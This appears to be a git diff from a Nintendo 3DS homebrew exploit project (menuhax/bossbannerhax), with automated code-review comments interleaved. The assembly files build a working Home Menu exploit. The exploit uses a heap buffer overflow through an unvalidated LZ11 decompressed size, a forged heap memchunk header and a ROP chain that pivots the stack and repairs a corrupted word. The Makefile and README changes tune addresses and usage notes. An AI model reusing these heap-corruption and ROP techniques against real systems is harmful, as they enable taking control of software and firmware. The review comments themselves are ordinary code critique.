diff --git a/Makefile.bossbannerhax b/Makefile.bossbannerhax
index 6555af8..99f87f9 100644
--- a/Makefile.bossbannerhax
+++ b/Makefile.bossbannerhax
@@ -23,8 +23,8 @@ buildbossbannerhax:
 @make -f Makefile finaloutput/bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds_bossbannerhax.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_HAX_NEW3DS) HEAPBUF=0x38f5c900 FIXHEAPBUF=$(HEAPBUF_HAX_NEW3DS) ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_NEW3DS) NEW3DS=1 BOSSPROGRAMID=000400102$(BOSSPROGRAMID) BOSSTOOLPARAMS=$(BOSSTOOLPARAMS) $(PARAMS)
 build_stage1_bossbannerhax:
- @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_OLD3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=$(HEAPBUF_HAX_OLD3DS) ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_OLD3DS) NEW3DS=0 $(PARAMS)
- @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_NEW3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=$(HEAPBUF_HAX_NEW3DS) ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_NEW3DS) NEW3DS=1 $(PARAMS)
+ @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_old3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_OLD3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=0x3535c900 ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_OLD3DS) NEW3DS=0 $(PARAMS)
+ @make -f Makefile finaloutput/stage1_bossbannerhax/$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds.bin --no-print-directory BUILDPREFIX=$(BUILDPREFIX)$(REGION)$(MENUVERSION)_new3ds MENUVERSION=$(MENUVERSION) HEAPBUF_OBJADDR=$(HEAPBUF_OBJADDR_NEW3DS) HEAPBUF=0x0FFF1000 FIXHEAPBUF=0x38f5c900 ROPBIN_BUFADR=$(HEAPBUF_ROPBIN_NEW3DS) NEW3DS=1 $(PARAMS)
 finaloutput/bossbannerhax/$(BUILDPREFIX)_bossbannerhax.bin: 
binpayload/$(BUILDPREFIX)_bossbannerhax.cbmd bosstool --input=$< --output=$@ --programID=$(BOSSPROGRAMID) --build --nsdataid=0x58484e42 --datatype=0x40001 $(BOSSTOOLPARAMS) diff --git a/README.md b/README.md index 71cf85d..3eff9ec 100644 --- a/README.md +++ b/README.md @@ -45,6 +45,8 @@ Do not change the system language with System Settings with sdiconhax installed. # Usage notes for bossbannerhax This does not trigger during Home Menu boot. This triggers when the Face Raiders icon is selected by the user, which triggers loading the exbanner data(Face Raiders is just the ideal target title for this among the system titles with exbanner-usage enabled). +Normal {return to homemenu code} is not supported with bossbannerhax. It will terminate Home Menu via svcExitProcess instead, resulting in the usual crash message. This doesn't matter much since the exploit only triggers when selecting the icon listed above. + # Supported System Versions As of menuhax v3.2, system-versions 9.0.0-X..11.2.0-X are all supported. During installation it automatically detects which exploit to install. See also the above sections. Note that as of November 2016 [bossbannerhax](https://www.3dbrew.org/wiki/3DS_Userland_Flaws) was the last known Home Menu vuln. 
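Review bot: The heap addresses in the two rewritten build_stage1_bossbannerhax recipe lines are bare literals (`FIXHEAPBUF=0x3535c900`, `FIXHEAPBUF=0x38f5c900`) with no named variable or comment saying what they are, whereas the lines they replace read `$(HEAPBUF_HAX_OLD3DS)`/`$(HEAPBUF_HAX_NEW3DS)`. The new3ds literal is the same value the buildbossbannerhax context line passes as `HEAPBUF=0x38f5c900`, which suggests it belongs in one named knob next to the existing HEAPBUF_* definitions, e.g. `FIXHEAPBUF_STAGE1_NEW3DS := 0x38f5c900` (constructed name), referenced from both recipes so the two cannot drift apart. Since these lines are being rewritten anyway, the recursive invocation should be `$(MAKE) -f Makefile …` rather than a literal `make`, so `-j`/jobserver and `-n` propagate to the sub-make. The variable definitions these recipes depend on are outside the hunk.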
@@ -65,6 +67,8 @@ If the menuhax-thread options are setup via the menuhax_manager configuration me This thread executes a loop. First it runs svcSleepThread, delaying with the user-specified value. Then it verifies that Home Menu is active by comparing the GSPGPU service session handle with 0x0. Then it checks if the pressed PAD buttons match the value specified in config. If so, the config file is updated so that menuhax automatically boots \*hax payload on next boot, then svcExitProcess is executed so that Home Menu restarts. +This is not usable with bossbannerhax due to no ret2menu. + # Installation To install menuhax you must use the menuhax_manager app. You must already have a way to boot into the \*hax payload for running this app(which can include menuhax if it's already setup): https://www.3dbrew.org/wiki/Homebrew_Exploits diff --git a/bossbannerhax_banner.s b/bossbannerhax_banner.s index 03fef4a..40ebf02 100644 --- a/bossbannerhax_banner.s +++ b/bossbannerhax_banner.s @@ -57,5 +57,19 @@ ropstackstart: #include "menuhax_loader.s" @ When decompressing exbanners from the BOSS CBMD, Home Menu doesn't validate the decompressed-size from the LZ11 header. The buffer size is 0x20224-bytes. Hence, the below triggers a buffer overflow. Only the last word here actually triggers a crash when invalid, or at least immediately. -.fill (((_start + 0x20224+0x24) - .) / 4), 4, ROPBUFLOC(object+0x20) +.space ((_start + 0x20224) - .) + +@ Start of DU memchunk(CTRSDK-heap memchunkhdr for allocated mem). +.word 0x5544 @ magicnum +.word 0x50 @ size +.word ROPBUF-0x10 @ prev memchunk +.word ROPBUF+0x20224+0x10+0x50 @ next memchunk + +@ Start of the allocated mem. +.word 0 @ vtable ptr +.word 0 @ .data/.bss ptr +.word 0 @ regular-heap ptr +.word 0 @ Actually zero in the original data. + +.word ROPBUFLOC(object+0x20) diff --git a/stage1_bossbannerhax.s b/stage1_bossbannerhax.s index 788ec6c..afe85d9 100644 --- a/stage1_bossbannerhax.s +++ b/stage1_bossbannerhax.s 
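Review bot: The added memchunk header in bossbannerhax_banner.s spells out the layout as raw literals (`0x20224`, `0x10`, `0x50`, `0x5544`, and `ROPBUF+0x20224+0x10+0x50` for the next-chunk pointer) that stage1_bossbannerhax.s repeats independently as `FIXHEAPBUF+0x20224+0x10+0x10`, so a change to one file silently desyncs the other. A pair of `.set` constants in a shared include, e.g. `.set EXBANNER_BUFSIZE, 0x20224` and `.set MEMCHUNK_HDRSIZE, 0x10` (constructed names), used in both files would make the relationship explicit. The pre-existing comment above `.space` still says "Only the last word here actually triggers a crash when invalid", which no longer describes the header words now placed between it and that last `.word ROPBUFLOC(object+0x20)`; a one-line note on the header block saying it exists so the words before the last one parse as a valid allocated chunk would keep the comment accurate. Whether `0x50` is the real size of the allocation being mimicked cannot be verified from this hunk; if it is derived from a specific Home Menu version, the comment should name that source.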
@@ -19,10 +19,15 @@ ROPMACRO_WRITEWORD BOSSBANNERHAX_SPRETADDR-(3*4), ROP_LOADR4_FROMOBJR0_CALLERFUN ROPMACRO_WRITEWORD BOSSBANNERHAX_SPRETADDR-(2*4), 0x1 @ fp value ROPMACRO_WRITEWORD BOSSBANNERHAX_SPRETADDR-(1*4), POP_R4R8PC +@ Copy the ptr from +0x14 to +0x10. This restores the word overwritten at the end of bossbannerhax_banner.s. +ROPMACRO_COPYWORD FIXHEAPBUF+0x20224+0x10+0x10, FIXHEAPBUF+0x20224+0x10+0x14 + #include "menuhax_loader.s" @ The ROP used for RET2MENU starts here. +.word MAINLR_SVCEXITPROCESS @ Can't really ret2menu since there's some data that (probably) can't be restored properly. And also the exploit will trigger again the next time the user selects the application icon, which triggers another crash. + ROPMACRO_STACKPIVOT BOSSBANNERHAX_SPRETADDR-(9*4), POP_R4FPPC @ Return to executing the original homemenu code. menuhaxloader_beforethreadexit:
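Review bot: After the added `.word MAINLR_SVCEXITPROCESS`, the following `ROPMACRO_STACKPIVOT BOSSBANNERHAX_SPRETADDR-(9*4), POP_R4FPPC` and the comments "@ The ROP used for RET2MENU starts here." and "@ Return to executing the original homemenu code." describe a path that, by the new comment's own account, is never reached, so the hunk leaves unreachable ROP words under stale comments. Either drop the pivot and retitle the section, e.g. `@ No ret2menu for bossbannerhax: terminate Home Menu instead (see note above).`, or, if the pivot is kept for a future restore, say so explicitly so the next reader does not take the RET2MENU comment at face value. The new `ROPMACRO_COPYWORD` comment says it "restores the word overwritten", but what it does is copy the neighbouring +0x14 word into +0x10; the comment should state the assumption this rests on (that the two words held the same value in the original data), since nothing in the hunk establishes it. The chain this sits in continues past the hunk at `menuhaxloader_beforethreadexit:`.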